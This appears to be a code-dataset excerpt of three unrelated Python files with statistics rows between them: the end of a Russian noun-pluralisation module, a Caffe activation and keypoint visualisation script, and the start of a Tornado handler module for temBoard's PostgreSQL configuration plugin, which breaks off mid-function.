WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ов', '.СмнР1'),
WordForm(f'{name[:-1]}', '.СмнР2'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(f'{name}', '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# II1+IV1
def get_plurl_ii1_and_iv1(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv1 = WordForm(f'{ser[:-1]}ы', '.СмнВ1')
smnv2 = WordForm(f'{ser}', '.СмнВ2')
smnv = ''
else:
smnv1 = ''
smnv2 = ''
smnv = WordForm(f'{ser[:-1]}ов', '.СмнВ3'),
word_forms = [
WordForm(f'{ser[:-1]}ы', '.СмнИ1'),
WordForm(f'{ser}', '.СмнИ2'),
WordForm(f'{ser[:-1]}ов', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
smnv1,
smnv2,
smnv,
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return list(filter(None, word_forms))
# II3
def get_plurl_ii3(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser[:-1]}ы'
else:
smnv = f'{ser[:-1]}ев'
word_forms = [
WordForm(f'{ser[:-1]}ы', '.СмнИ'),
WordForm(f'{ser[:-1]}ев', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# II6
def get_plurl_ii6(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# II6*
def get_plurl_ii6_prim(name: str, inf_0: str, __) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# III12
def get_plurl_iii12(_, __, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-2]}ий', '.СмнР'),
WordForm(f'{ser[:-1]}ям', '.СмнД'),
WordForm(f'{ser}', '.СмнВ'),
WordForm(f'{ser[:-1]}ями', '.СмнТ'),
WordForm(f'{ser[:-1]}ях', '.СмнП'),
]
return word_forms
# III2*
def get_plurl_iii2_prim(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}ев'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ев', '.СмнР'),
WordForm(f'{name[:-1]}ям', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ями', '.СмнТ'),
WordForm(f'{name[:-1]}ях', '.СмнП'),
]
return word_forms
# III7
def get_plurl_iii7(name, __, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{name[:-1]}ей', '.СмнР'),
WordForm(f'{name[:-1]}ям', '.СмнД'),
WordForm(f'{name[:-1]}ей', '.СмнВ1'),
WordForm(f'{name[:-1]}ями', '.СмнТ'),
WordForm(f'{name[:-1]}ях', '.СмнП'),
]
return word_forms
# III7*
def get_plurl_iii7_prim(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}ей', '.СмнР'),
WordForm(f'{name[:-1]}ям', '.СмнД'),
WordForm(f'{name}', '.СмнВ'),
WordForm(f'{name[:-1]}ями', '.СмнТ'),
WordForm(f'{name[:-1]}ях', '.СмнП'),
]
return word_forms
# IV1
def get_plurl_iv1(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}ов'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}ов', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# IV1+I1
def get_plurl_iv1_and_i1(_, __, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser}', '.СмнИ1'),
WordForm(f'{ser[:-1]}и', '.СмнИ2'),
WordForm(f'{ser[:-1]}ов', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(f'{ser}', '.СмнВ1'),
WordForm(f'{ser[:-1]}и', '.СмнВ2'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# IV12
def get_plurl_iv12(name: str, inf_0: str, _) -> list:
if inf_0 == 'неод':
smnv = f'{name[:-4]}ята'
else:
smnv = f'{name[:-4]}ят'
word_forms = [
WordForm(f'{name[:-4]}ята', '.СмнИ'),
WordForm(f'{name[:-4]}ят', '.СмнР'),
WordForm(f'{name[:-4]}ятам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-4]}ятами', '.СмнТ'),
WordForm(f'{name[:-4]}ятах', '.СмнП'),
]
return word_forms
# IV13
def get_plurl_iv13(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name[:-4]}ата', '.СмнИ'),
WordForm(f'{name[:-4]}ат', '.СмнР'),
WordForm(f'{name[:-4]}атам', '.СмнД'),
WordForm(f'{name[:-4]}ат', '.СмнВ'),
WordForm(f'{name[:-4]}атами', '.СмнТ'),
WordForm(f'{name[:-4]}атах', '.СмнП'),
]
return word_forms
# IV6
def get_plurl_iv6(_, inf_0: str, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
if inf_0 == 'неод':
smnv = f'{ser}'
else:
smnv = f'{ser[:-1]}'
word_forms = [
WordForm(f'{ser}', '.СмнИ'),
WordForm(f'{ser[:-1]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# IV6*
def get_plurl_iv6_prim(name: str, inf_0: str, __) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# IV6*+I13*
def get_plurl_iv6_prim_and_i13(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name}', '.СмнИ1'),
WordForm(f'{name[:-1]}и', '.СмнИ2'),
WordForm(f'{name[:-1]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(f'{name}', '.СмнВ1'),
WordForm(f'{name[:-1]}и', '.СмнВ2'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# IV6*+II5*
def get_plurl_iv6_prim_and_ii5_prim(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name}', '.СмнИ1'),
WordForm(f'{name[:-1]}ы', '.СмнИ2'),
WordForm(f'{name[:-1]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(f'{name}', '.СмнВ1'),
WordForm(f'{name[:-1]}ы', '.СмнВ2'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# IV6+I13
def get_plurl_iv6_and_i13(_, __, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser}', '.СмнИ1'),
WordForm(f'{ser[:-1]}и', '.СмнИ2'),
WordForm(f'{ser[:-1]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(f'{ser}', '.СмнВ1'),
WordForm(f'{ser[:-1]}и', '.СмнВ2'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# V2
def get_plurl_v2(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name[:-2]}е', '.СмнИ'),
WordForm(f'{name[:-2]}', '.СмнР'),
WordForm(f'{name[:-2]}ам', '.СмнД'),
WordForm(f'{name[:-2]}', '.СмнВ'),
WordForm(f'{name[:-2]}ами', '.СмнТ'),
WordForm(f'{name[:-2]}ах', '.СмнП'),
]
return word_forms
| 30.057444 | 91 | 0.505675 | 3,538 | 25,639 | 3.487281 | 0.035613 | 0.196953 | 0.139083 | 0.118009 | 0.893824 | 0.845761 | 0.823553 | 0.803048 | 0.795105 | 0.774113 | 0 | 0.038992 | 0.252779 | 25,639 | 852 | 92 | 30.092723 | 0.605021 | 0.010999 | 0 | 0.706215 | 0 | 0 | 0.229757 | 0.009919 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067797 | false | 0 | 0.001412 | 0 | 0.137006 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2d0dd67823156e1e8a95bee4b0dc27468c60d3a5 | 13,141 | py | Python | visualize_results.py | cbfinn/caffe | 05e3ca9e8d27c887588fae2e915a37f352157b9d | [
"BSD-2-Clause"
] | 11 | 2015-05-22T14:47:13.000Z | 2021-04-03T14:23:03.000Z | visualize_results.py | cbfinn/caffe | 05e3ca9e8d27c887588fae2e915a37f352157b9d | [
"BSD-2-Clause"
] | 5 | 2015-04-14T06:02:42.000Z | 2015-08-22T01:16:49.000Z | visualize_results.py | cbfinn/caffe | 05e3ca9e8d27c887588fae2e915a37f352157b9d | [
"BSD-2-Clause"
] | 3 | 2015-04-21T23:58:28.000Z | 2018-05-29T02:41:58.000Z | import caffe
import matplotlib.pylab as plt
import numpy as np
import h5py
import copy
def vis_square_color_pts(mydata,pts,timesteps,filterind=[],redpoints=[], padsize=1, padval=0,alpha=1.0, filename=[]):
ind = timesteps[0]
if len(timesteps) == 1:
data = copy.deepcopy(mydata[ind:ind+1,:,:,:].transpose(0,2,3,1))
else:
if len(filterind) > 0:
print "WARNING: points may not be correct"
data = copy.deepcopy(mydata[np.sort(timesteps),:,:,:].transpose(0,2,3,1))
#for i in range(data.shape[0]):
# data[i,:,:,:] -= data[i,:,:,:].max()
# data[i,:,:,:] /= data[i,:,:,:].min()
data -= data.min()
data /= data.max()
img_width = mydata.shape[2]
# force the number of filters to be square
n = int(np.ceil(np.sqrt(data.shape[0])))
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
# tile the filters into an image
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
plt.imshow(data, alpha = alpha)
plt.axis("off")
if len(filterind) != 0:
ax=plt.gca();
NUM_COLORS=len(filterind)
cm = plt.get_cmap('nipy_spectral');
redi = []
#ax.set_color_cycle([cm(1.*i/NUM_COLORS) for i in range(NUM_COLORS)]);
for i in range(len(filterind)):
filteri = filterind[i]
if filteri in redpoints:
redi.append(filteri);
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'or', markersize=10);
else:
#plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'o', color=cm((1.*i)/NUM_COLORS),markersize=7);
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'ob', markersize=10,markeredgecolor=cm((1.*i)/NUM_COLORS),fillstyle='none', markeredgewidth=3.0);
for filteri in redi:
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'or', markersize=10);
plt.xlim([0,img_width]);plt.ylim([img_width,0]);
if filename: plt.savefig(filename, bbox_inches='tight')
def vis_square_color_pts_compare(mydata,pts,pts2,timesteps,filterind=[],redpoints=[], padsize=1, padval=0,alpha=1.0, filename=[]):
ind = timesteps[0]
if len(timesteps) == 1:
data = copy.deepcopy(mydata[ind:ind+1,:,:,:].transpose(0,2,3,1))
else:
if len(filterind) > 0:
print "WARNING: points may not be correct"
data = copy.deepcopy(mydata[np.sort(timesteps),:,:,:].transpose(0,2,3,1))
#for i in range(data.shape[0]):
# data[i,:,:,:] -= data[i,:,:,:].max()
# data[i,:,:,:] /= data[i,:,:,:].min()
data -= data.min()
data /= data.max()
img_width = mydata.shape[2]
# force the number of filters to be square
n = int(np.ceil(np.sqrt(data.shape[0])))
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
# tile the filters into an image
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
plt.imshow(data, alpha = alpha)
plt.axis("off")
if len(filterind) != 0:
ax=plt.gca();
NUM_COLORS=len(filterind)
cm = plt.get_cmap('nipy_spectral');
redi = []
#ax.set_color_cycle([cm(1.*i/NUM_COLORS) for i in range(NUM_COLORS)]);
for i in range(len(filterind)):
filteri = filterind[i]
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'x', markersize=12,markeredgecolor=(.894,0,0,1.0),fillstyle='none', markeredgewidth=3.0);
plt.plot((pts2[ind,filteri*2]+1)/2.0*img_width,(pts2[ind,filteri*2+1]+1)/2.0*img_width,'ob', markersize=12,markeredgecolor=(0,0,.894,0.7),fillstyle='none', markeredgewidth=3.0);
#plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'o', color=cm((1.*i)/NUM_COLORS),markersize=7);
#plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'ob', markersize=10);
for filteri in redi:
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'or', markersize=10);
plt.xlim([0,img_width]);plt.ylim([img_width,0]);
if filename: plt.savefig(filename, bbox_inches='tight')
def vis_square_color_pts_compare_discrep(mydata,pts,pts2,timesteps,timesteps2,filterind=[],redpoints=[], padsize=1, padval=0,alpha=1.0, filename=[]):
ind = timesteps[0]
ind2 = timesteps2[0]
if len(timesteps) == 1:
data = copy.deepcopy(mydata[ind:ind+1,:,:,:].transpose(0,2,3,1))
else:
if len(filterind) > 0:
print "WARNING: points may not be correct"
data = copy.deepcopy(mydata[np.sort(timesteps),:,:,:].transpose(0,2,3,1))
#for i in range(data.shape[0]):
# data[i,:,:,:] -= data[i,:,:,:].max()
# data[i,:,:,:] /= data[i,:,:,:].min()
data -= data.min()
data /= data.max()
img_width = mydata.shape[2]
# force the number of filters to be square
n = int(np.ceil(np.sqrt(data.shape[0])))
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
# tile the filters into an image
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
plt.imshow(data, alpha = alpha)
plt.axis("off")
if len(filterind) != 0:
ax=plt.gca();
NUM_COLORS=len(filterind)
cm = plt.get_cmap('nipy_spectral');
redi = []
#ax.set_color_cycle([cm(1.*i/NUM_COLORS) for i in range(NUM_COLORS)]);
for i in range(len(filterind)):
filteri = filterind[i]
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'x', markersize=12,markeredgecolor=(.894,0,0,1.0),fillstyle='none', markeredgewidth=3.0);
plt.plot((pts2[ind2,filteri*2]+1)/2.0*img_width,(pts2[ind2,filteri*2+1]+1)/2.0*img_width,'ob', markersize=12,markeredgecolor=(0,0,.894,0.7),fillstyle='none', markeredgewidth=3.0);
#plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'o', color=cm((1.*i)/NUM_COLORS),markersize=7);
#plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'ob', markersize=10);
for filteri in redi:
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'or', markersize=10);
plt.xlim([0,img_width]);plt.ylim([img_width,0]);
if filename: plt.savefig(filename, bbox_inches='tight')
def vis_square_pts(mydata,pts,timesteps,filterinds,pointinds=[], padsize=1, padval=1, filename=[]):
if len(timesteps) == 1:
assert(len(timesteps) == 1)
t = timesteps[0];
data = -copy.deepcopy(mydata[t:t+1,filterinds,:,:].transpose(1,2,3,0))
else:
assert(len(filterinds) == 1)
i = filterinds[0]
data = -copy.deepcopy(mydata[timesteps,i:i+1,:,:].transpose(0,2,3,1))
for i in range(data.shape[0]):
data[i,:,:,:] -= data[i,:,:,:].min()
data[i,:,:,:] /= data[i,:,:,:].max()
# data -= data.min()
# data /= data.max()
img_width = mydata.shape[2]
print data.max()
print data.min()
# force the number of filters to be square
n = int(np.ceil(np.sqrt(data.shape[0])))
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
# tile the filters into an image
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
plt.imshow(data[:,:,0], cmap='Greys', interpolation='nearest')
plt.axis("off")
if len(pointinds) != 0:
assert(len(timesteps) == 1)
t = timesteps[0];
#ax=plt.gca();
#NUM_COLORS=len(pointinds)
#cm = plt.get_cmap('nipy_spectral');
#ax.set_color_cycle([cm(1.*i/NUM_COLORS) for i in range(NUM_COLORS)]);
for i in range(len(pointinds)):
filteri = pointinds[i]
plt.plot((pts[t,filteri*2]+1)/2.0*img_width,(pts[t,filteri*2+1]+1)/2.0*img_width,'or');
plt.xlim([0,img_width]);plt.ylim([img_width,0]);
if filename: plt.savefig(filename, bbox_inches='tight')
class PoseResults:
def __init__(self, suffix):
plt.rcParams['figure.figsize'] = (10, 10)
prefix = "test_output/"
#prefix = "pose_baseline/"
#pose_output = h5py.File(prefix + suffix + ".h5", "r");
#self.pose = pose_output['data']
#self.pose_gt = pose_output['label']
softmax_output = h5py.File(prefix +"softmax_" + suffix + ".h5", "r");
self.softmax = softmax_output['data']
self.points = softmax_output['label']
conv1_output = h5py.File(prefix +"conv1_"+ suffix + ".h5", "r");
conv2_output = h5py.File(prefix +"conv2_"+ suffix + ".h5", "r");
conv3_output = h5py.File(prefix +"conv3_"+ suffix + ".h5", "r");
self.conv1 = conv1_output['data']
self.conv2 = conv2_output['data']
self.conv3 = conv3_output['data']
self.rgb = conv3_output['label']
#self.get_mean_dist()
#self.order_timesteps()
# defines the distances, and sorts everything in decreasing order of accuracy
def get_mean_dist(self, pt_idx=0):
diff = np.asarray(self.pose)-np.asarray(self.pose_gt);
diff = diff[:,pt_idx*3:pt_idx*3+3,0,0]
diffsq = np.power(diff,2);
eucsq = np.sum(diffsq,1);
print 'network output: ', np.mean(eucsq)/2
euc = np.power(eucsq,0.5);
loss=np.mean(euc);
std_dist = np.std(euc);
print 'mean distance: ', loss
print 'std distance: ', std_dist
self.euc = euc;
def order_timesteps(self):
order = np.argsort(self.euc)
self.euc = np.asarray([self.euc[i] for i in order])
self.rgb = np.asarray([self.rgb[i,:,:,:] for i in order])
self.conv1 = np.asarray([self.conv1[i,:,:,:] for i in order])
self.conv2 = np.asarray([self.conv2[i,:,:,:] for i in order])
self.conv3 = np.asarray([self.conv3[i,:,:,:] for i in order])
self.softmax = np.asarray([self.softmax[i,:,:,:] for i in order])
self.points = np.asarray([self.points[i,:,0,0] for i in order])
# Returns mean and standard deviation in distance for each point and all points together.
def get_mean_dists(self):
all_eucs = []
for pt_idx in range(3):
diff = np.asarray(self.pose)-np.asarray(self.pose_gt);
diff = diff[:,pt_idx*3:pt_idx*3+3,0,0]
diffsq = np.power(diff,2);
eucsq = np.sum(diffsq,1);
print 'network output: ', np.mean(eucsq)/2
euc = np.power(eucsq,0.5);
all_eucs.extend(euc)
loss=np.mean(euc);
std_dist = np.std(euc);
print 'mean distance: ', loss
print 'std distance: ', std_dist
self.euc = euc;
std_dist = np.std(all_eucs);
self.all_eucs = all_eucs
print 'all mean = ', np.mean(all_eucs)
print 'all std = ', np.std(all_eucs)
def vis_rgb(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
vis_square_color_pts(self.rgb, self.points, timesteps, filters,padsize=padsize, padval=padval);
def vis_conv1(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
if filters == []:
filters = [0]
vis_square_pts(self.conv1, self.points, timesteps, filters,padsize=padsize, padval=padval);
def vis_conv2(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
if filters == []:
filters = [0]
vis_square_pts(self.conv2, self.points, timesteps, filters,padsize=padsize, padval=padval);
def vis_conv3(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
if filters == []:
filters = [0]
vis_square_pts(self.conv3, self.points, timesteps, filters, padsize=padsize, padval=padval);
def vis_softmax(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
if filters == []:
filters = [0]
vis_square_pts(self.softmax, self.points, timesteps, filters,padsize=padsize, padval=padval);
def vis_conv3_pts(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
if filters == []:
filters = [0]
vis_square_pts(self.conv3, self.points, timesteps, filters, filters,padsize=padsize, padval=padval);
def vis_softmax_pts(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
if filters == []:
filters = [0]
vis_square_pts(self.softmax, self.points, timesteps, filters, filters,padsize=padsize, padval=padval);
| 43.226974 | 192 | 0.622403 | 2,069 | 13,141 | 3.869986 | 0.087482 | 0.041963 | 0.038217 | 0.02248 | 0.807419 | 0.788935 | 0.771825 | 0.761833 | 0.750468 | 0.739478 | 0 | 0.043662 | 0.172133 | 13,141 | 303 | 193 | 43.369637 | 0.692343 | 0.148543 | 0 | 0.668142 | 0 | 0 | 0.041256 | 0 | 0 | 0 | 0 | 0 | 0.013274 | 0 | null | null | 0 | 0.022124 | null | null | 0.057522 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2d1f47cf3060573eea44573f31f53adcd40554bb | 45,607 | py | Python | temboardui/plugins/pgconf/__init__.py | bersace/temboard | 3feb7bbe24f5eabcb66c0bd35f32d548d8613b15 | [
"PostgreSQL"
] | null | null | null | temboardui/plugins/pgconf/__init__.py | bersace/temboard | 3feb7bbe24f5eabcb66c0bd35f32d548d8613b15 | [
"PostgreSQL"
] | null | null | null | temboardui/plugins/pgconf/__init__.py | bersace/temboard | 3feb7bbe24f5eabcb66c0bd35f32d548d8613b15 | [
"PostgreSQL"
] | null | null | null | from os import path
import tornado.web
import tornado.escape
from temboardui.handlers.base import JsonHandler, BaseHandler
from temboardui.temboardclient import (
TemboardError,
temboard_delete_hba_version,
temboard_get_conf_file,
temboard_get_conf_file_raw,
temboard_get_conf_file_versions,
temboard_get_configuration,
temboard_get_configuration_categories,
temboard_get_configuration_status,
temboard_get_file_content,
temboard_get_hba_options,
temboard_post_administration_control,
temboard_post_conf_file,
temboard_post_configuration,
temboard_post_file_content,
temboard_profile,
)
from temboardui.async import (
HTMLAsyncResult,
JSONAsyncResult,
run_background,
)
from temboardui.errors import TemboardUIError
from temboardui.application import get_instance
def configuration(config):
return {}
def get_routes(config):
plugin_path = path.dirname(path.realpath(__file__))
handler_conf = {
'ssl_ca_cert_file': config.temboard['ssl_ca_cert_file'],
'template_path': plugin_path + "/templates"
}
routes = [
(
r"/server/(.*)/([0-9]{1,5})/pgconf/configuration$",
ConfigurationHandler,
handler_conf
),
(
r"/server/(.*)/([0-9]{1,5})/pgconf/configuration/category/(.+)$",
ConfigurationHandler,
handler_conf
),
(
r"/server/(.*)/([0-9]{1,5})/pgconf/hba",
HBAHandler,
handler_conf
),
(
r"/server/(.*)/([0-9]{1,5})/pgconf/pg_ident",
PGIdentHandler,
handler_conf
),
(
r"/proxy/(.*)/([0-9]{1,5})/administration/control",
AdminControlProxyHandler,
handler_conf
),
(
r"/proxy/(.*)/([0-9]{1,5})/pgconf/configuration",
ConfigurationProxyHandler,
handler_conf
),
(
r"/proxy/(.*)/([0-9]{1,5})/pgconf/hba/options",
HBAOptionsProxyHandler,
handler_conf
),
(
r"/proxy/(.*)/([0-9]{1,5})/pgconf/hba$",
HBAProxyHandler,
handler_conf
),
(
r"/proxy/(.*)/([0-9]{1,5})/pgconf/hba/delete$",
HBADeleteProxyHandler,
handler_conf
),
(
r"/js/pgconf/(.*)",
tornado.web.StaticFileHandler,
{'path': plugin_path + "/static/js"}
),
(
r"/css/pgconf/(.*)",
tornado.web.StaticFileHandler,
{'path': plugin_path + "/static/css"}
),
]
return routes
class ConfigurationHandler(BaseHandler):
""" HTML handler """
def get_configuration(self, agent_address, agent_port, category=None):
try:
self.logger.info("Getting configuration.")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
else:
data_profile = temboard_profile(self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession)
agent_username = data_profile['username']
configuration_status = temboard_get_configuration_status(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession)
configuration_cat = temboard_get_configuration_categories(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession)
query_filter = self.get_argument('filter', None, True)
if category is None:
category = tornado.escape.url_escape(
configuration_cat['categories'][0])
url = tornado.escape.url_escape(
tornado.escape.url_unescape(category))
configuration_data = temboard_get_configuration(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
url,
query_filter)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='configuration.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'data': configuration_data,
'xsession': xsession,
'agent_username': agent_username,
'current_cat': tornado.escape.url_unescape(category),
'configuration_categories': configuration_cat,
'configuration_status': configuration_status,
'query_filter': query_filter
})
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.expunge_all()
self.db_session.rollback()
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
if e.code == 401:
return HTMLAsyncResult(
http_code=401,
redirection="/server/%s/%s/login" %
(agent_address, agent_port))
elif e.code == 302:
